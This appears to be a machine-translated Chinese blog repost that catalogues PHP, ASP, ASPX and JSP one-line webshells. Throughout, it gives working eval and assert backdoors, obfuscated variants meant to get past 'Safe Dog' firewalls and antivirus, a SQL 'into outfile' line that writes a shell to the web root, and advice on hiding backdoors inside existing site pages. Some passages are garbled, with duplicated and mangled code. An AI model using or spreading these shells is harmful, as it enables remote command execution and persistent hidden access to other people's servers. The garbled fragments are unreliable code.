当前位置：网站首页>The most complete sentence in history

The most complete sentence in history

2022-06-30 06:38:00 【zkzq】

 Zero basic hacker , Search official account ： White hat left

Catalog

PHP
A common sentence
PHP series
Once a dog said
PHP The dog
A few transgender php– Through the firewall
phpv9 Advanced version shell ASP
asp In a word
ASP A word about safety dog
ASPX series
aspx In a word JSP
The guardian God It is easy to make mistakes by inserting a sentence
The transformation from a one sentence Trojan horse to a two sentence Trojan horse ! In a word, don't kill ：
One ： Deformation method Support variant kitchen knife connection to pass the safety dog , Yes D A word of file scanning
ASP
ASP
ASPX

PHP

<pre> 
<body>
<? @system($_GET["cc"]); ?>
</body> 
</pre>

// One sentence of executable command

A common sentence

<?php eval($_POST[cc123]) ?>


<?php @eval($_POST['cc123']);?>

PHP series

<?php $a = str_replace(x,"","axsxxsxexrxxt");$a($_POST["xindong"]); ?>


<?php $lang = (string)key($_POST);$lang($_POST['xindong']);?>


<?php $k="ass"."ert"; $k(${
    "_PO"."ST"} ['xindong']);?>


<?php  $a = "a"."s"."s"."e"."r"."t";  $a($_POST["xindong"]);  ?>


<?php                  
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";                  
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";                  
@$_/*-/*-*/($/*-/*-*/{
    "_P"./*-/*-*/"OS"./*-/*-*/"T"}                  
[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?>     The password is   -7

Once a dog said

select '<?php @eval($_POST[cmd]);?>' into outfile 'C:/Inetpub/wwwroot/mysql-php/1.php'

<?php $_=""; $_[+$_]++; $_=$_.""; $___=$_[+""];//A $____=$___; $____++;//B $_____=$____; $_____++;//C $______=$_____; $______++;//D $_______=$______; $_______++;//E $________=$_______; $________++;$________++;$________++;$________++;$________++;$________++;$________++;$________++;$________++;$________++;//O $_________=$________; $_________++;$_________++;$_________++;$_________++;//S $_=$____.$___.$_________.$_______.'6'.'4'.'_'.$______.$_______.$_____.$________.$______.$_______; $________++;$________++;$________++;//R $_____=$_________; $_____++;//T $__=$___.$_________.$_________.$_______.$________.$_____; $__($_("ZXZhbCgkX1BPU1RbMV0p")); ?> <?php $_REQUEST['a']($_REQUEST['b']); ?> <?php $t=$_GET['t']; $tt=$_GET['tt']; $s=
t;$s($REQUEST[′cc123′]);?><?php$t=$GET[′t′];//t=tt$tt=$GET[′tt′];//tt=as$ttt=$GET[′ttt′];//ttt=sert$s=
t;$s($REQUEST[′cc123′]);?><?php$t=$GET[′t′];//t=tt$tt=$GET[′tt′];//tt=as$ttt=$GET[′ttt′];//ttt=sert$s=
t.$ttt; $s($_REQUEST['cc']);?> <?php $t=$_GET['t']; //t=tt $tt=$_GET['tt']; //tt=as $ttt=$_GET['ttt']; //ttt=s $tttt=$_GET['tttt']; //ttt=ert $s=
t.$ttt.$tttt;$s($REQUEST[′cc′]);?><?php$t=$GET[′t′];//t=tt$tt=$GET[′tt′];//tt=as$ttt=$GET[′ttt′];//ttt=tttt$tttt=$GET[′tttt′];//ttt=sert$s=
t.$ttt.$tttt;$s($REQUEST[′cc′]);?><?php$t=$GET[′t′];//t=tt$tt=$GET[′tt′];//tt=as$ttt=$GET[′ttt′];//ttt=tttt$tttt=$GET[′tttt′];//ttt=sert$s=
t.
ttt;$s($REQUEST[′cc′]);?><?php$a=$REQUEST[′a′];//a=b;$b=$REQUEST[′b′];//b=as;$c=$REQUEST[′c′];//c=sert;$d=$REQUEST[′d′];//d=c;$e=
ttt;$s($REQUEST[′cc′]);?><?php$a=$REQUEST[′a′];//a=b;$b=$REQUEST[′b′];//b=as;$c=$REQUEST[′c′];//c=sert;$d=$REQUEST[′d′];//d=c;$e=
a.
d;$e($REQUEST[′cc′]);?><?php$a=$REQUEST[′a′];//a=assert;$b=$REQUEST[′b′];//b=a;$d=
d;$e($REQUEST[′cc′]);?><?php$a=$REQUEST[′a′];//a=assert;$b=$REQUEST[′b′];//b=a;$d=
b; $d($_REQUEST['cc']); ?>
PHP The dog 
<?php if($_POST[x]!=''){
    $a="base64_decode"; eval($a($_POST[z0]));}?>  password ：x
<%a=request(“gold”)%><%eval a%>


fuck<?php
eval
($_POST
[a])
?>


<?php $a=range(1,200);$b=chr($a[96]).chr($a[114]).chr($a[114]).chr($a[100]).chr($a[113]).chr($a[115]); $b(${
    chr($a[94]).chr($a[79]).chr($a[78]).chr($a[82]).chr($a[83])}[chr($a[51])]); ?>  password  4
 The log directory does not exist or has insufficient permissions , Please check the settings ！<?php
eval
($_POST
[a])
?>

A few transgender php– Through the firewall

The effect of passing the dog is good ：

<?php $a = str_replace(x,"","axsxxsxexrxxt");$a($_POST["sz"]); ?> <?php $lang = (string)key($_POST);$lang($_POST['sz']); ?> <?php $k="ass"."ert"; $k(${
    "_PO"."ST"} ['sz']);?> <?php $a = "a"."s"."s"."e"."r"."t"; $a($_POST["sz"]); ?>
 This is 90 The hair <?php


@$_=“s”.“s”./-/-/“e”./-/-/“r”;


@= / ∗ − / ∗ − ∗ / &quot; a &quot; . / ∗ − / ∗ − ∗ / _=/*-/*-*/&quot;a&quot;./*-/*-*/ 
=

 /∗−/∗−∗/"a"./∗−/∗−∗/_./-/-*/“t”;


@/ ∗ − / ∗ − ∗ / ( _/*-/*-*/( 
/

 ∗−/∗−∗/(/-/-/{
    "_P"./-/-/“OS”./-/-*/“T”}


[/-/-/0/-/-/-/-/-/2/-/-/-/-/-/5/-/-/]);?>

password -7

phpv9 Advanced version shell

<?php file_put_contents('c7.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUW2NjMjc4OV0pOz8+')); ?>
…/…/…/…/html/special/cc/index

ASP

asp In a word

<%execute(request(“cmd”))%>
<%execute request(“1”)%>
ASP In a word 16 Base number ：┼ "The number is perfect and the enemy is full of energy ∨≡┩ Kai   password a
"%><%Eval(Request(chr(112)))%><%’ p


<%Y=request(“xindong”)%> <%execute(Y)%>


<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))(“xindong”))%>


<%eval""&(“e”&“v”&“a”&“l”&"("&“r”&“e”&“q”&“u”&“e”&“s”&“t”&"("&“0”&"-"&“2”&"-"&“5”&")"&")")%>（ The password is -7）

ASP A word about safety dog

 password （pass）


<% %>


<%a=request(“zl”)%><%eval a%>

ASPX series

ASPX In a word The effect of passing the safety dog is not very good

But I think I can support aspx Per cent 8/90 Support asp

<%@ Page Language = Jscript %>
<%var/-/-/P/-/-/=/-/-/“e”+“v”+/-/-/
“a”+“l”+"("+“R”+“e”+/-/-/“q”+“u”+“e”/-/-/+“s”+“t”+
“[/-/-/0/-/-/-/-/-/2/-/-/-/-/-/5/-/-/]”+
“,”+"""+“u”+“n”+“s”/-/-/+“a”+“f”+“e”+"""+")";eval
(/-/-/P/-/-/,/-/-/“u”+“n”+“s”/-/-/+“a”+“f”+“e”/-/-/);%>  password  -7


<%@ Page Language=“Jscript”%><%eval(Request.Item[“xindong”],“unsafe”);%>


 The password is webadmin

aspx In a word

<%@ Page Language=“Jscript” validateRequest=“false” %><%Response.Write(eval(Request.Item[“w”],“unsafe”));%>

JSP

<%if(request.getParameter(“f”)!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter(“f”))).write(request.getParameter(“t”).getBytes());%>


select ‘<?php eval($_POST[cmd];?>’ into outfile ‘C:/Inetpub/wwwroot/mysql-php/1.php’

The guardian God

<%E=request(“1”)%>abc

123456789<%execute E%>

The original code is <%execute request(“cmd”)%> Change the label and replace it by

<scriptlanguage=VBScript runat=server>execute request(“cmd”) So it's avoided <%,%> Symbol ！

Segment limits in the table , The Trojan horse can't write a word

The smallest Trojan code circulating on the network is <%eval request(“#”)%> If you can't even write down what to do ？

Just write the Trojans separately ！<%Y=request(“x”)%> <%execute(Y)%> In this way, you can write separately and submit to the database ！

however , stay ACCESS The physical location of the newly added data in the database is before the old data , So first write <%execute(Y)%> part . When writing the password on the client, you should fill in "x" Any character other than , If you fill in "x" Will go wrong ！

It is easy to make mistakes by inserting a sentence

for example

Sub unlockPost()


Dim id,replyid,rs,posttable


id=Request(“id”)


replyid=Request(“replyid”)


If Not IsNumeric(id) or id="" Then

It's written in

Sub unlockPost(<%eval request("#")%>)


Dim id,replyid,rs,posttable


id=Request(“id”)


replyid=Request(“replyid”)


If Not IsNumeric(id) or id="" Then

That's all right. , It can also be written in the format of fault-tolerant statements ！！

<%if request(“cmd”)<>""then execute request(“cmd”)%>

The transformation from a one sentence Trojan horse to a two sentence Trojan horse !

In a word, Trojan server prototype :<%execute request(“value”)%> ,

After deformation :<%On Error Resume Next execute request(“value”)%> ,

As for why we should use the two sentence Trojan horse , Because it makes our back door more hidden .

I also tried to insert a sentence WellShell One of the ASP In the document , However, there are often errors when accessing , However, the Trojan server can be accessed normally by inserting two sentences , It has no effect on the pages of the site .

In this way, the goal of more concealment is achieved , His administrator will not even delete his own web page files .

Now my WellShell All have such back doors . Select the Trojan horse that you want to insert two sentences ASP Attention should be paid to the documents , Choose some that you can use IE Access to the ASP file , Don't choose conn.asp Such a file to insert .

Of course , The client of the two sentence Trojan horse is still the client of the one sentence Trojan horse , No need to modify .

In a word, don't kill ：

One ： Deformation method

such as ：eval(request(“#”)) What about such a horse , Generally, they are not killed . But actually , Often anti-virus software will eval(request List as signature . So let's deform

E=request(“id”)


eval(E)

In this way, the goal of avoiding killing can be achieved .

for example ：<%execute request(“1”)%> After deformation ：

<%E=request(“1”)

execute E%>

Of course , This deformation is the best thing to do .

Introduce the second method ： Because many administrators are smart , It will check. ASP In the document execute and eval function . So , No matter how you decompile , It always ends up using one of these functions to explain the operation , So it was discovered . Good yao , We use external files to call . To build a a.jpg Or any undetected file suffix or file name . write in execute(request(“#”)) Of course , You can deform it first and then put it on . And then in ASP File insert

To quote it , that will do .

however , The administrator can find the modified files by comparing them , But that's not much .

stay WEBSHeLL Using command prompts in

In the use of ASP Assistant of stationmaster 6.0 Click the command prompt to display “ No authority ” When , have access to ASP Webmaster assistant upload CMD.exe To your WEBSHELL Catalog （ Other directories are OK , Upload the following CMD.exe Absolute path COPY come out ）, Modify your WEBSHELL Call found CMD.EXE Code for . The original code is as follows

.exec("cmd.exe /c "&DefCmd).stdout.readall

It is amended as follows

.exec(“ What you want to upload cmd.exe Absolute path ” /c"&DefCmd).stdout.readall

For example, the directory you upload to is D：\web\www\cmd.exe, Then change it to

.exec(“D：\web\www\cmd.exe /c”&DefCmd).stdout.readall

Support variant kitchen knife connection to pass the safety dog , Yes D A word of file scanning

It's not a word anymore , For several sentences .

Continue with the last ： I use several gestures of a sentence

This time I studied PHP, Send me a sentence I use （ Can be scanned by file ）.

ASP

<?php $mujj = $_POST['z']; if ($mujj!="") {
     $xsser=base64_decode($_POST['z0']); @eval("\$safedg = $xsser;"); } ?>

password z, Support kitchen knife connection ; Support variant kitchen knife connection to pass the safety dog .

in addition ：

ASP

<% Function MorfiCoder(Code) MorfiCoder=Replace(Replace(StrReverse(Code),"//",""""),"*",vbCrlf)
End Function
Execute MorfiCoder(")//z/*/(tseuqer lave") %>

ASPX

<% popup(popup(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("UmVxdWVzdC5JdGVtWyJ6Il0=")))); %>

Sharing is the key to communication , I don't like big horses The pony One word is my favorite , Not only is it highly hidden No killing effect is good And no back door （ Of course, excluding the kitchen knife ） ---- Not a word is forbidden post Under the circumstances .

author ：V
Link to the original text ：https://blog.csdn.net/qq_44632668/article/details/97818432

Insert picture description here